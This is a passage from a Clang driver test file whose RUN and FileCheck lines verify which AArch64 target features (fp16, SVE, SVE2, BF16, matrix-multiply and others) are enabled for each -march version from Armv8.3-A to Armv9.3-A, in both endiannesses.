// GENERICV83A-NO-FP16FML-NOT: "-target-feature" "{{[+-]}}fullfp16"
// RUN: %clang -target aarch64 -march=armv8.3a+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-FP16 %s
// RUN: %clang -target aarch64 -march=armv8.3-a+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-FP16 %s
// GENERICV83A-FP16: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.3a" "-target-feature" "+fullfp16"
// RUN: %clang -target aarch64 -march=armv8.3a+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.3-a+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-FP16FML %s
// GENERICV83A-FP16FML: "-target-feature" "+fp16fml" "-target-feature" "+fullfp16"
// RUN: %clang -target aarch64 -march=armv8.3a+fp16+nofp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-FP16-NO-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.3-a+fp16+nofp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-FP16-NO-FP16FML %s
// GENERICV83A-FP16-NO-FP16FML: "-target-feature" "+fullfp16" "-target-feature" "-fp16fml"
// RUN: %clang -target aarch64 -march=armv8.3a+nofp16fml+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-NO-FP16FML-FP16 %s
// RUN: %clang -target aarch64 -march=armv8.3-a+nofp16fml+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-NO-FP16FML-FP16 %s
// GENERICV83A-NO-FP16FML-FP16: "-target-feature" "-fp16fml" "-target-feature" "+fullfp16"
// RUN: %clang -target aarch64 -march=armv8.3a+fp16fml+nofp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-FP16FML-NO-FP16 %s
// RUN: %clang -target aarch64 -march=armv8.3-a+fp16fml+nofp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-FP16FML-NO-FP16 %s
// GENERICV83A-FP16FML-NO-FP16: "-target-feature" "-fullfp16" "-target-feature" "-fp16fml"
// RUN: %clang -target aarch64 -march=armv8.3a+nofp16+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-NO-FP16-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.3-a+nofp16+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV83A-NO-FP16-FP16FML %s
// GENERICV83A-NO-FP16-FP16FML: "-target-feature" "+fp16fml" "-target-feature" "+fullfp16"
// RUN: %clang -target aarch64 -march=armv8.4a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A %s
// RUN: %clang -target aarch64 -march=armv8.4-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.4a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.4-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.4a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.4-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A %s
// GENERICV84A: "-cc1"{{.*}} "-triple" "aarch64{{(--)?}}"{{.*}} "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.4a"
// RUN: %clang -target aarch64_be -march=armv8.4a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-BE %s
// RUN: %clang -target aarch64_be -march=armv8.4-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.4a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.4-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.4a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.4-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-BE %s
// GENERICV84A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.4a"
// RUN: %clang -target aarch64 -march=armv8.4a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-NO-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.4-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-NO-FP16FML %s
// GENERICV84A-NO-FP16FML-NOT: "-target-feature" "{{[+-]}}fp16fml"
// GENERICV84A-NO-FP16FML-NOT: "-target-feature" "{{[+-]}}fullfp16"
// RUN: %clang -target aarch64 -march=armv8.4a+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-FP16 %s
// RUN: %clang -target aarch64 -march=armv8.4-a+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-FP16 %s
// GENERICV84A-FP16: "-target-feature" "+fullfp16" "-target-feature" "+fp16fml"
// RUN: %clang -target aarch64 -march=armv8.4a+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.4-a+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-FP16FML %s
// GENERICV84A-FP16FML: "-target-feature" "+fp16fml" "-target-feature" "+fullfp16"
// RUN: %clang -target aarch64 -march=armv8.4a+fp16+nofp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-FP16-NO-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.4-a+fp16+nofp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-FP16-NO-FP16FML %s
// GENERICV84A-FP16-NO-FP16FML: "-target-feature" "+fullfp16" "-target-feature" "-fp16fml"
// RUN: %clang -target aarch64 -march=armv8.4a+nofp16fml+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-NO-FP16FML-FP16 %s
// RUN: %clang -target aarch64 -march=armv8.4-a+nofp16fml+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-NO-FP16FML-FP16 %s
// GENERICV84A-NO-FP16FML-FP16: "-target-feature" "+fullfp16" "-target-feature" "+fp16fml"
// RUN: %clang -target aarch64 -march=armv8.4a+fp16fml+nofp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-FP16FML-NO-FP16 %s
// RUN: %clang -target aarch64 -march=armv8.4-a+fp16fml+nofp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-FP16FML-NO-FP16 %s
// GENERICV84A-FP16FML-NO-FP16: "-target-feature" "-fullfp16" "-target-feature" "-fp16fml"
// RUN: %clang -target aarch64 -march=armv8.4a+nofp16+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-NO-FP16-FP16FML %s
// RUN: %clang -target aarch64 -march=armv8.4-a+nofp16+fp16fml -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV84A-NO-FP16-FP16FML %s
// GENERICV84A-NO-FP16-FP16FML: "-target-feature" "+fp16fml" "-target-feature" "+fullfp16"
// RUN: %clang -target aarch64 -march=armv8.5a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A %s
// RUN: %clang -target aarch64 -march=armv8.5-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.5a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.5-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.5a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.5-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A %s
// GENERICV85A: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.5a"
// RUN: %clang -target aarch64_be -march=armv8.5a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A-BE %s
// RUN: %clang -target aarch64_be -march=armv8.5-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.5a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.5-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.5a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.5-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A-BE %s
// GENERICV85A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.5a"
// RUN: %clang -target aarch64 -march=armv8.5-a+fp16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A-FP16 %s
// GENERICV85A-FP16: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.5a" "-target-feature" "+fullfp16"
// RUN: %clang -target aarch64 -march=armv8.6a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A %s
// RUN: %clang -target aarch64 -march=armv8.6-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.6a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.6-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.6a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.6-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A %s
// GENERICV86A: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.6a"
// RUN: %clang -target aarch64_be -march=armv8.6a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A-BE %s
// RUN: %clang -target aarch64_be -march=armv8.6-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.6a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.6-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.6a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.6-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV86A-BE %s
// GENERICV86A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.6a"
// The SVE extension is an optional extension for Armv8-A.
// RUN: %clang -target aarch64 -march=armv8a+sve -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV8A-SVE %s
// RUN: %clang -target aarch64 -march=armv8.6a+sve -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV8A-SVE %s
// GENERICV8A-SVE: "-target-feature" "+sve"
// RUN: %clang -target aarch64 -march=armv8a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV8A-NOSVE %s
// RUN: %clang -target aarch64 -march=armv8.6a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV8A-NOSVE %s
// GENERICV8A-NOSVE-NOT: "-target-feature" "+sve"
// The BFloat16 extension is a mandatory component of the Armv8.6-A extensions, but is permitted as an
// optional feature for any implementation of Armv8.2-A to Armv8.5-A (inclusive)
// RUN: %clang -target aarch64 -march=armv8.5a+bf16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A-BF16 %s
// GENERICV85A-BF16: "-target-feature" "+bf16"
// RUN: %clang -target aarch64 -march=armv8.5a+bf16+nobf16 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV85A-BF16-NO-BF16 %s
// GENERICV85A-BF16-NO-BF16: "-target-feature" "-bf16"
// RUN: %clang -target aarch64 -march=armv8.5a+bf16+sve -### -c %s 2>&1 | FileCheck -check-prefixes=GENERICV85A-BF16-SVE %s
// GENERICV85A-BF16-SVE: "-target-feature" "+bf16" "-target-feature" "+sve"
// The 8-bit integer matrix multiply extension is a mandatory component of the
// Armv8.6-A extensions, but is permitted as an optional feature for any
// implementation of Armv8.2-A to Armv8.5-A (inclusive)
// RUN: %clang -target aarch64 -march=armv8.5a -### -c %s 2>&1 | FileCheck -check-prefix=NO-I8MM %s
// RUN: %clang -target aarch64 -march=armv8.5a+i8mm -### -c %s 2>&1 | FileCheck -check-prefix=I8MM %s
// NO-I8MM-NOT: "-target-feature" "+i8mm"
// I8MM: "-target-feature" "+i8mm"
// The 32-bit floating point matrix multiply extension is enabled by default
// for armv8.6-a targets (or later) with SVE, and can optionally be enabled for
// any target from armv8.2a onwards (we don't enforce not using it with earlier
// targets).
// RUN: %clang -target aarch64 -march=armv8.6a -### -c %s 2>&1 | FileCheck -check-prefix=NO-F32MM %s
// RUN: %clang -target aarch64 -march=armv8.6a+sve -### -c %s 2>&1 | FileCheck -check-prefix=F32MM %s
// RUN: %clang -target aarch64 -march=armv8.5a+f32mm -### -c %s 2>&1 | FileCheck -check-prefix=F32MM %s
// NO-F32MM-NOT: "-target-feature" "+f32mm"
// F32MM: "-target-feature" "+f32mm"
// The 64-bit floating point matrix multiply extension is not currently enabled
// by default for any targets, because it requires an SVE vector length >= 256
// bits. When we add a CPU which has that, then it can be enabled by default,
// but for now it can only be used by adding the +f64mm feature.
// RUN: %clang -target aarch64 -march=armv8.6a -### -c %s 2>&1 | FileCheck -check-prefix=NO-F64MM %s
// RUN: %clang -target aarch64 -march=armv8.6a+sve -### -c %s 2>&1 | FileCheck -check-prefix=NO-F64MM %s
// RUN: %clang -target aarch64 -march=armv8.6a+f64mm -### -c %s 2>&1 | FileCheck -check-prefix=F64MM %s
// NO-F64MM-NOT: "-target-feature" "+f64mm"
// F64MM: "-target-feature" "+f64mm"
// RUN: %clang -target aarch64 -march=armv8.7a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A %s
// RUN: %clang -target aarch64 -march=armv8.7-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.7a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.7-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.7a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.7-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A %s
// GENERICV87A: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.7a"
// RUN: %clang -target aarch64_be -march=armv8.7a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A-BE %s
// RUN: %clang -target aarch64_be -march=armv8.7-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.7a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.7-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.7a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.7-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV87A-BE %s
// GENERICV87A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.7a"
// Tha LD64B/ST64B accelerator extension is disabled by default.
// RUN: %clang -target aarch64 -march=armv8.7a -### -c %s 2>&1 | FileCheck -check-prefix=NO-LS64 %s
// RUN: %clang -target aarch64 -march=armv8.7a+ls64 -### -c %s 2>&1 | FileCheck -check-prefix=LS64 %s
// NO-LS64-NOT: "-target-feature" "+ls64"
// LS64: "-target-feature" "+ls64"
// RUN: %clang -target aarch64 -march=armv8.8a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A %s
// RUN: %clang -target aarch64 -march=armv8.8-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.8a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv8.8-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.8a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv8.8-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A %s
// GENERICV88A: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.8a"
// RUN: %clang -target aarch64_be -march=armv8.8a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A-BE %s
// RUN: %clang -target aarch64_be -march=armv8.8-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.8a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv8.8-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.8a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv8.8-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV88A-BE %s
// GENERICV88A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.8a"
//
// RUN: %clang -target aarch64 -march=armv9a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A %s
// RUN: %clang -target aarch64 -march=armv9-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv9a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv9-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv9a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv9-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A %s
// GENERICV9A: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v9a" "-target-feature" "+sve" "-target-feature" "+sve2"
// SVE2 is enabled by default on Armv9-A but it can be disabled
// RUN: %clang -target aarch64 -march=armv9a+nosve2 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-NOSVE2 %s
// RUN: %clang -target aarch64 -march=armv9-a+nosve2 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-NOSVE2 %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv9a+nosve2 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-NOSVE2 %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv9-a+nosve2 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-NOSVE2 %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv9a+nosve2 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-NOSVE2 %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv9-a+nosve2 -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-NOSVE2 %s
// GENERICV9A-NOSVE2: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v9a" "-target-feature" "+sve" "-target-feature" "-sve2"
// RUN: %clang -target aarch64_be -march=armv9a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-BE %s
// RUN: %clang -target aarch64_be -march=armv9-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv9a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv9-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv9a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv9-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV9A-BE %s
// GENERICV9A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v9a" "-target-feature" "+sve" "-target-feature" "+sve2"
// RUN: %clang -target aarch64 -march=armv9.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A %s
// RUN: %clang -target aarch64 -march=armv9.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv9.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv9.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv9.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv9.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A %s
// GENERICV91A: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v9.1a" "-target-feature" "+i8mm" "-target-feature" "+bf16" "-target-feature" "+sve" "-target-feature" "+sve2"
// RUN: %clang -target aarch64_be -march=armv9.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A-BE %s
// RUN: %clang -target aarch64_be -march=armv9.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv9.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv9.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv9.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv9.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV91A-BE %s
// GENERICV91A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v9.1a" "-target-feature" "+i8mm" "-target-feature" "+bf16" "-target-feature" "+sve" "-target-feature" "+sve2"
// RUN: %clang -target aarch64 -march=armv9.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A %s
// RUN: %clang -target aarch64 -march=armv9.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv9.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv9.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv9.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv9.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A %s
// GENERICV92A: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v9.2a" "-target-feature" "+i8mm" "-target-feature" "+bf16" "-target-feature" "+sve" "-target-feature" "+sve2"
// RUN: %clang -target aarch64_be -march=armv9.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A-BE %s
// RUN: %clang -target aarch64_be -march=armv9.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv9.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv9.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv9.2a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv9.2-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV92A-BE %s
// GENERICV92A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v9.2a" "-target-feature" "+i8mm" "-target-feature" "+bf16" "-target-feature" "+sve" "-target-feature" "+sve2"
// RUN: %clang -target aarch64 -march=armv9.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A %s
// RUN: %clang -target aarch64 -march=armv9.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv9.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A %s
// RUN: %clang -target aarch64 -mlittle-endian -march=armv9.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv9.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A %s
// RUN: %clang -target aarch64_be -mlittle-endian -march=armv9.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A %s
// GENERICV93A: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v9.3a"
// RUN: %clang -target aarch64_be -march=armv9.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A-BE %s
// RUN: %clang -target aarch64_be -march=armv9.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv9.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=armv9.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv9.3a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=armv9.3-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV93A-BE %s
// GENERICV93A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v9.3a"
// fullfp16 is off by default for v8a, feature must not be mentioned
// RUN: %clang -target aarch64 -march=armv8a -### -c %s 2>&1 | FileCheck -check-prefix=V82ANOFP16 -check-prefix=GENERIC %s
// RUN: %clang -target aarch64 -march=armv8-a -### -c %s 2>&1 | FileCheck -check-prefix=V82ANOFP16 -check-prefix=GENERIC %s
// V82ANOFP16-NOT: "-target-feature" "{{[+-]}}fp16fml"
// V82ANOFP16-NOT: "-target-feature" "{{[+-]}}fullfp16"
// GENERIC: "-cc1"{{.*}} "-triple" "aarch64{{(--)?}}"{{.*}} "-target-cpu" "generic"
// RAS is on by default for v8.2a, but can be disabled by +noras
// RUN: %clang -target aarch64 -march=armv8.2a -### -c %s 2>&1 | FileCheck -check-prefix=V82ARAS -check-prefix=GENERICV82A %s
// RUN: %clang -target aarch64 -march=armv8.2-a -### -c %s 2>&1 | FileCheck -check-prefix=V82ARAS -check-prefix=GENERICV82A %s
// V82ARAS-NOT: "-target-feature" "+ras"
// V82ARAS-NOT: "-target-feature" "-ras"
// RUN: %clang -target aarch64 -march=armv8.2a+noras -### -c %s 2>&1 | FileCheck -check-prefix=V82ANORAS -check-prefix=GENERICV82A %s
// RUN: %clang -target aarch64 -march=armv8.2-a+noras -### -c %s 2>&1 | FileCheck -check-prefix=V82ANORAS -check-prefix=GENERICV82A %s
